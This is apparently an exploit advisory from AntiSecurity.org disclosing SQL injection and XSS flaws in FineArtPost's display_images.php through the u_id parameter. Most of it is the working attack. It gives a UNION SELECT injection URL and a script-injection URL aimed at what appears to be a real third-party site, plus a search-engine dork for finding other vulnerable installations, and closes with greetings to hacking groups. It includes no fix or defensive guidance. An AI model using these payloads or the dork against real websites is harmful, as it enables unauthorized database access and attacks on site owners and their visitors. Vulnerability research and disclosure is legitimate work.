-------+AntiSecurity[dot]Org------------- ================================================================== Title : FineArtPost SQL Injection & XSS Vulnerability Software : FineArtPost Vendor : http://www.fineartpost.com Author : OoN_Boy Blog : http://oon.blogspot.com Web : http://oonboy.info ================================================================== [o] Vulnerable file display_images.php ================================================================== [o] Exploit sql http://target.com/[path]/display_images.php?u_id=[SQL] xss http://target.com/[path]/display_images.php?u_id=[Xss] ================================================================== [0] Poc http://www.ctbauer.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69-- http://www.ctbauer.com/public/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22 ================================================================== [o] Dork "Powered by FineArtPost" ================================================================== [O] Special Greetz www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org - Vrs-hCk, NoGe, h4ntu, Opay, Ipay, Paman, reel, H312Y, pizzyroot, xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, kaka11, ================================================================== Mohon Maaf lahir batin all maaf kalo banyak salah kata selama ini pensiun mode on :))